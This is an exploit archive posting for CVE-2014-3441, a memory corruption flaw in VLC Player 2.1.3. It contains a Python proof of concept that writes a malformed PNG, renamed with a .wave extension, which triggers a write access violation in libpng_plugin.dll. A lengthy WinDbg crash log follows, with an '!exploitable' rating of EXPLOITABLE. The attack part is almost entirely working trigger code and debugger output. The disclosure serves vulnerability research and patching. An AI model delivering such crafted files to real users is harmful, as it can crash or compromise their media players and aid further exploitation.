what you don't know can hurt you

VLC Player 2.1.3 Memory Corruption

VLC Player 2.1.3 Memory Corruption
Posted May 9, 2014
Authored by Aryan Bayaninejad

VLC Player version 2.1.3 suffers from a memory corruption vulnerability.

tags | exploit
advisories | CVE-2014-3441
MD5 | 794364be52dbbb0e9cb70ba2c60810d1

VLC Player 2.1.3 Memory Corruption

Change Mirror Download
# Exploit Title: [VLCplayer memory corruption in latest Version 2.1.3 ]
# Date: [2014/05/07]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.videolan.org]
# Software Link: [
http://filehippo.com/download_vlc_32/download/b39c14a9f03cb9cf32eb01b1123b97bf/
]
# Version: [Version 2.1.3 and prior to that]
# Tested on: [Windows Xp Sp 3 x86]
# CVE : [2014-3441]

details:

VLCplayer latest version V 2.1.3 suffers from an memory corruption
Vulnerability via a malformed .png file format when load
codec\libpng_plugin.dll, you can change file extention to .wave


Poc:

#!/usr/bin/python
data =
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x7F\xFF\xFF\xFF\x00\x00\x01\x02\x01\x03\x00\x00\x00\xBA\x1B\xD8\x84\x00\x00\x00\x03\x50\x4C\x54\x45\xFF\xFF\xFF\xA7\xC4\x1B\xC8\x00\x00\x00\x01\x74\x52\x4E\x53\x00\x40\xE6\xD8\x66\x00\x68\x92\x01\x49\x44\x41\x54\xFF\x05\x3A\x92\x65\x41\x71\x68\x42\x49\x45\x4E\x44\xAE\x42\x60\x82"
outfile = file("poc.wave", 'wb')
outfile.write(data)
outfile.close()
print "Created Poc"





windbg result:


Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: "C:\Program Files\VideoLAN\VLC\vlc.exe"
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path. *
* Use .symfix to have the debugger choose a symbol path. *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is:
ModLoad: 00400000 00426000 image00400000
ModLoad: 7c900000 7c9af000 ntdll.dll
ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
ModLoad: 6a300000 6a324000 C:\Program Files\VideoLAN\VLC\libvlc.dll
ModLoad: 6a540000 6a791000 C:\Program Files\VideoLAN\VLC\libvlccore.dll
ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f02000 C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll
ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.DLL
ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll
ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll
ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.DLL
ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 76bf0000 76bfb000 C:\WINDOWS\system32\PSAPI.DLL
ModLoad: 771b0000 7725a000 C:\WINDOWS\system32\WININET.DLL
ModLoad: 77a80000 77b15000 C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000 C:\WINDOWS\system32\MSASN1.dll
ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll
ModLoad: 774e0000 7761d000 C:\WINDOWS\system32\ole32.dll
(250.c1c): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
ntdll.dll -
eax=00351eb4 ebx=7ffde000 ecx=00000006 edx=00000040 esi=00351f48
edi=00351eb4
eip=7c90120e esp=0022fb20 ebp=0022fc94 iopl=0 nv up ei pl nz na po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000202
ntdll!DbgBreakPoint:
7c90120e cc int 3
0:000> g
ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL
ModLoad: 629c0000 629c9000 C:\WINDOWS\system32\LPK.DLL
ModLoad: 74d90000 74dfb000 C:\WINDOWS\system32\USP10.dll
ModLoad: 773d0000 774d3000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll
ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll
ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\version.dll
ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime
ModLoad: 10000000 10008000 C:\Program Files\Internet Download
Manager\idmmkb.dll
ModLoad: 64fc0000 65008000 C:\Program
Files\VideoLAN\VLC\plugins\access\libdshow_plugin.dll
ModLoad: 6aac0000 6aacf000 C:\Program
Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll
ModLoad: 6e980000 6e990000 C:\Program
Files\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll
ModLoad: 6a100000 6a119000 C:\Program
Files\VideoLAN\VLC\plugins\video_output\libdirectdraw_plugin.dll
ModLoad: 6c400000 6c5f6000 C:\Program
Files\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll
ModLoad: 68740000 68760000 C:\Program
Files\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll
ModLoad: 6f440000 6f483000 C:\Program
Files\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll
ModLoad: 6b840000 6b85b000 C:\Program
Files\VideoLAN\VLC\plugins\access\libaccess_vdr_plugin.dll
ModLoad: 6f100000 6f114000 C:\Program
Files\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll
ModLoad: 68bc0000 68bd7000 C:\Program
Files\VideoLAN\VLC\plugins\stream_filter\libsmooth_plugin.dll
ModLoad: 64a00000 64a8b000 C:\Program
Files\VideoLAN\VLC\plugins\stream_filter\libhttplive_plugin.dll
ModLoad: 70680000 70736000 C:\Program
Files\VideoLAN\VLC\plugins\stream_filter\libdash_plugin.dll
ModLoad: 6ae40000 6ae64000 C:\Program
Files\VideoLAN\VLC\plugins\access\libzip_plugin.dll
ModLoad: 69e40000 69e52000 C:\Program
Files\VideoLAN\VLC\plugins\access\libstream_filter_rar_plugin.dll
ModLoad: 6d700000 6d70c000 C:\Program
Files\VideoLAN\VLC\plugins\stream_filter\librecord_plugin.dll
ModLoad: 70240000 70267000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll
ModLoad: 6cd00000 6ce7a000 C:\Program
Files\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll
ModLoad: 66040000 66090000 C:\Program
Files\VideoLAN\VLC\plugins\lua\liblua_plugin.dll
ModLoad: 625c0000 626f9000 C:\Program
Files\VideoLAN\VLC\plugins\misc\libxml_plugin.dll
ModLoad: 73f10000 73f6c000 C:\WINDOWS\system32\DSOUND.DLL
ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 76c30000 76c5e000 C:\WINDOWS\system32\WINTRUST.dll
ModLoad: 76c90000 76cb8000 C:\WINDOWS\system32\IMAGEHLP.dll
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d10000 72d18000 C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 6ff40000 6ff55000 C:\Program
Files\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll
ModLoad: 6e180000 6e191000 C:\Program
Files\VideoLAN\VLC\plugins\control\libglobalhotkeys_plugin.dll
main libvlc: Running vlc with the default interface. Use 'cvlc' to use vlc
without interface.
ModLoad: 68e80000 6992e000 C:\Program
Files\VideoLAN\VLC\plugins\gui\libqt4_plugin.dll
ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\COMDLG32.DLL
ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV
ModLoad: 71ad0000 71ad9000 C:\WINDOWS\system32\WSOCK32.DLL
ModLoad: 769c0000 76a74000 C:\WINDOWS\system32\userenv.dll
ModLoad: 01a20000 01ce5000 C:\WINDOWS\system32\xpsp2res.dll
ModLoad: 5d090000 5d12a000 C:\WINDOWS\system32\comctl32.dll
ModLoad: 76360000 76370000 C:\WINDOWS\system32\winsta.dll
ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\SETUPAPI.dll
ModLoad: 6d6c0000 6d6f7000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
ModLoad: 6e040000 6e05e000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
ModLoad: 68440000 68458000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
ModLoad: 6c380000 6c39b000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libflacsys_plugin.dll
ModLoad: 6ef40000 6ef4e000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libes_plugin.dll
es demux error: cannot peek
es demux error: cannot peek
ModLoad: 011e0000 011fa000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libmpc_plugin.dll
ModLoad: 6c2c0000 6c2cd000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libtta_plugin.dll
ModLoad: 62380000 6238e000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libnuv_plugin.dll
ModLoad: 67e00000 67e0d000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libwav_plugin.dll
ModLoad: 03610000 036fc000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libsid_plugin.dll
ModLoad: 6bf40000 6bf65000 C:\Program
Files\VideoLAN\VLC\plugins\services_discovery\libsap_plugin.dll
ModLoad: 6f8c0000 6f8eb000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libogg_plugin.dll
ModLoad: 6a840000 6a96f000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll
ModLoad: 70b00000 70b0c000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libdirac_plugin.dll
ModLoad: 6d8c0000 6d97b000 C:\Program
Files\VideoLAN\VLC\plugins\access\liblive555_plugin.dll
ModLoad: 64740000 6474d000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libsmf_plugin.dll
ModLoad: 6cbc0000 6cbcd000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libpva_plugin.dll
ModLoad: 65300000 6530c000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libxa_plugin.dll
ModLoad: 67500000 6750d000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libaiff_plugin.dll
ModLoad: 6ce80000 6ce8d000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libvoc_plugin.dll
ModLoad: 6fec0000 6fecc000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libau_plugin.dll
ModLoad: 6b500000 6b56d000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libgme_plugin.dll
ModLoad: 65280000 6528d000 C:\Program
Files\VideoLAN\VLC\plugins\demux\librawvid_plugin.dll
ModLoad: 6c940000 6c94e000 C:\Program
Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll
ModLoad: 683c0000 6840f000 C:\Program
Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll
(250.b14): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\WINDOWS\system32\msvcrt.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll -
eax=00000000 ebx=018dee98 ecx=03ffe8c8 edx=00000000 esi=018ded80
edi=018e5000
eip=77c47631 esp=029ff940 ebp=029ff980 iopl=0 nv up ei pl nz na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010206
msvcrt!memset+0x41:
77c47631 f3ab rep stos dword ptr es:[edi]
0:009> .load winext/msec.dll
0:009> !exploitable

!exploitable 1.6.0.0
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Program Files\VideoLAN\VLC\libvlccore.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Program Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll -
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at
msvcrt!memset+0x0000000000000041 (Hash=0xefdbe58f.0x255f6419)

User mode write access violations that are not near NULL are exploitable.
Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    1 Files
  • 17
    Jan 17th
    2 Files
  • 18
    Jan 18th
    20 Files
  • 19
    Jan 19th
    32 Files
  • 20
    Jan 20th
    15 Files
  • 21
    Jan 21st
    10 Files
  • 22
    Jan 22nd
    16 Files
  • 23
    Jan 23rd
    1 Files
  • 24
    Jan 24th
    1 Files
  • 25
    Jan 25th
    36 Files
  • 26
    Jan 26th
    26 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close